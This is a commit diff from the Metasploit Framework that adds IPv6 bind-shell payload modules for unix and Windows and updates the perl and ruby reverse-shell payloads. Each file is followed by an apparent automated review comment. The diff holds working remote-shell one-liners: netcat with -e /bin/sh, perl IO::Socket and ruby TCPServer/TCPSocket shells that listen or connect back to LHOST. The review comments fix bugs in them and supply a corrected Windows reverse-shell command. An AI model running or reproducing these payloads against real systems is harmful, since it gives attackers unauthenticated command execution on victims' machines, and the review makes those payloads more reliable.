Additional IPv6 payload support
HD Moore committed Dec 14, 2011
1 parent f6ef4ce commit 866e2b6
Showing 7 changed files with 233 additions and 5 deletions.
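--- a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
@@ -0,0 +1,57 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection and spawn a command shell via netcat',
+'Author' => 'hdm',
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'netcat-e',
+'Payload' =>
+{
+'Offsets' => { },
+'Payload' => ''
+}
+))
+end
+
+#
+# Constructs the payload
+#
+def generate
+return super + command_string
+end
+
+#
+# Returns the command string to use for execution
+#
+def command_string
+"nc -6 -lp #{datastore['LPORT']} -e /bin/sh"
+end
+
+end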
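Review bot: The `-6` switch on the `nc` line in `command_string` narrows the set of netcats this runs on beyond what `'RequiredCmd' => 'netcat-e'` expresses: as far as I know, netcat-traditional (the usual `-e`-capable build) has no `-6`, OpenBSD nc has `-6` but no `-e`, and only Ncat-style binaries accept both, so an operator picking this for a target with the classic netcat gets a usage error instead of a listener. Neither the name nor the description says this, so I would document it in the module: `# NOTE: needs a netcat that accepts both -6 and -e (e.g. Ncat); netcat-traditional and OpenBSD nc do not`. As with every bind shell the listener is unauthenticated, which on a dual-stack host means one more address family it is reachable on.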
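--- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
@@ -0,0 +1,60 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Unix Command Shell, Bind TCP (via perl) IPv6',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection and spawn a command shell via perl',
+'Author' => ['Samy <samy@samy.pl>', 'cazz'],
+'License' => BSD_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'perl',
+'Payload' =>
+{
+'Offsets' => { },
+'Payload' => ''
+}
+))
+end
+
+#
+# Constructs the payload
+#
+def generate
+return super + command_string
+end
+
+#
+# Returns the command string to use for execution
+#
+def command_string
+
+cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
+
+return cmd
+end
+
+end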
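Review bot: The one-liner on the `cmd =` line instantiates `IO::Socket::INET6`, but as far as I can tell `-MIO` only pulls in the core IO::Socket::INET/UNIX classes; IO::Socket::INET6 is a separate non-core module that nothing here loads, so even on a target that has it installed I would expect the call to fail with "Can't locate object method new via package IO::Socket::INET6". Loading it explicitly should fix that: `cmd = "perl -MIO -MIO::Socket::INET6 -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"`. Either way the module depends on a non-core perl module, which the description should state so operators do not read `'RequiredCmd' => 'perl'` as "any perl will do".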
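--- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
@@ -0,0 +1,46 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Unix Command Shell, Bind TCP (via Ruby) IPv6',
+'Version' => '$Revision$',
+'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
+'Author' => 'kris katterjohn',
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'ruby',
+'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+))
+end
+
+def generate
+return super + command_string
+end
+
+def command_string
+"ruby -rsocket -e 'exit if fork;s=TCPServer.new(\"::\",\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
+end
+end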
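Review bot: `TCPServer.new("::", ...)` in `command_string` is not an IPv6-only listener on most targets: binding the unspecified v6 address on Linux with the default `net.ipv6.bindv6only=0` also accepts IPv4 clients via v4-mapped addresses, so this unauthenticated, persistent shell is reachable over both families while the name and description promise only IPv6. If that exposure is acceptable it should be stated rather than implied, e.g. `'Description' => 'Continually listen on :: (all IPv6, and on dual-stack hosts also IPv4) and spawn a command shell via Ruby'`. If a genuinely v6-only socket is wanted, TCPServer offers no hook to set IPV6_V6ONLY before bind, so the one-liner would have to move to the lower-level Socket API.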
5 changes: 4 additions & 1 deletion modules/payloads/singles/cmd/unix/reverse_perl.rb
Expand Up @@ -51,7 +51,10 @@ def generate
# Returns the command string to use for execution
#
def command_string
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
end

end
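Review bot: The added `ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""` line reads `lhost` before the next line assigns it, so Ruby parses that `lhost` as a method call; unless the payload class happens to provide an `lhost` method this raises NameError the first time the payload is generated, and if one exists, `ver` is computed from something other than the local the later lines use. Assigning first fixes it: `lhost = datastore['LHOST']` and then `ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""`. Separately, when `ver` is "6" the one-liner instantiates `IO::Socket::INET6`, which as far as I can tell `-MIO` does not load (it is a separate non-core module), so the IPv6 path also needs `-MIO::Socket::INET6` on the perl command line or it fails on the target. `command_string` is fully inside this hunk.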
4 changes: 3 additions & 1 deletion modules/payloads/singles/cmd/unix/reverse_ruby.rb
Expand Up @@ -41,6 +41,8 @@ def generate
end

def command_string
"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{datastore['LHOST']}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
end
end
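Review bot: The bracket wrapping in `lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)` is what the perl `host:port` form needs, but as far as I can tell not this one: `TCPSocket.new` takes host and port as separate arguments, so a bare IPv6 literal is already unambiguous, and the bracketed form only works if the target's Ruby socket layer strips `[...]` itself, which I would not assume across Ruby versions. Passing `datastore['LHOST']` unchanged (the pre-commit line) should therefore already handle IPv6, so I would either drop the wrapping or confirm it on a target with `ruby -rsocket -e 'TCPSocket.new("[::1]",22)'` before keeping it. `command_string` is fully inside this hunk.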
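--- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
@@ -0,0 +1,59 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+include Msf::Payload::Single
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Windows Command Shell, Bind TCP (via perl) IPv6',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)',
+'Author' => ['Samy <samy@samy.pl>', 'cazz', 'patrick'],
+'License' => BSD_LICENSE,
+'Platform' => 'win',
+'Arch' => ARCH_CMD,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'PayloadType' => 'cmd',
+'Payload' =>
+{
+'Offsets' => { },
+'Payload' => ''
+}
+))
+end
+
+#
+# Constructs the payload
+#
+def generate
+return super + command_string
+end
+
+#
+# Returns the command string to use for execution
+#
+def command_string
+
+cmd = "perl -MIO -e \"while($c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\""
+
+return cmd
+end
+
+end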
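Review bot: The info hash in `initialize` omits `'RequiredCmd' => 'perl'`, which the unix `bind_perl_ipv6.rb` in this same commit declares; exploits that select compatible payloads by required command cannot tell this one needs perl, so I would add `'RequiredCmd' => 'perl',` after `'PayloadType' => 'cmd',`. The one-liner on the `cmd =` line also instantiates `IO::Socket::INET6` under `-MIO` alone, and as far as I can tell IO does not load that module (it is a separate non-core distribution, and on Windows perls it is often absent), so the command should load it explicitly with `-MIO -MIO::Socket::INET6` and the description should name the dependency. Unlike the unix variant this one has no `fork`, which is correct for Windows perl.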
7 changes: 4 additions & 3 deletions modules/payloads/singles/cmd/windows/reverse_perl.rb
Expand Up @@ -50,9 +50,10 @@ def generate
# Returns the command string to use for execution
#
def command_string

cmd = "perl -MIO -e \"$c=new IO::Socket::INET(PeerAddr,\\\"#{datastore['LHOST']}:#{datastore['LPORT']}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\""

ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
end

end
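Review bot: The replacement `cmd =` line switches the Windows command to the unix form, a single-quoted `-e` program with `$p=fork;exit,if($p);`, but cmd.exe does not treat `'` as a quoting character, so the program is split at its spaces (`new IO::Socket…`, `system$_ while<>`) and perl receives only the first fragment; the removed line's double-quoted form with `\\\"`-escaped inner quotes was the one that works under cmd.exe, and it deliberately had no `fork`. The `ver = Rex::Socket.is_ipv6?(lhost)` line additionally reads `lhost` before the following line assigns it, so unless the class provides an `lhost` method this raises NameError before the command is ever built. I would keep the Windows quoting and thread `ver`/`lhost` through it as below, loading IO::Socket::INET6 only on the v6 path since I do not believe `-MIO` pulls it in and v4 targets should not start requiring it. `command_string` is fully inside this hunk.
```ruby
def command_string
  lhost = datastore['LHOST']
  ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
  lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
  # IO::Socket::INET6 is not loaded by -MIO; only the v6 path needs it
  mods = ver.empty? ? "-MIO" : "-MIO -MIO::Socket::INET6"
  cmd = "perl #{mods} -e \"$c=new IO::Socket::INET#{ver}(PeerAddr,\\\"#{lhost}:#{datastore['LPORT']}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\""
end
```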
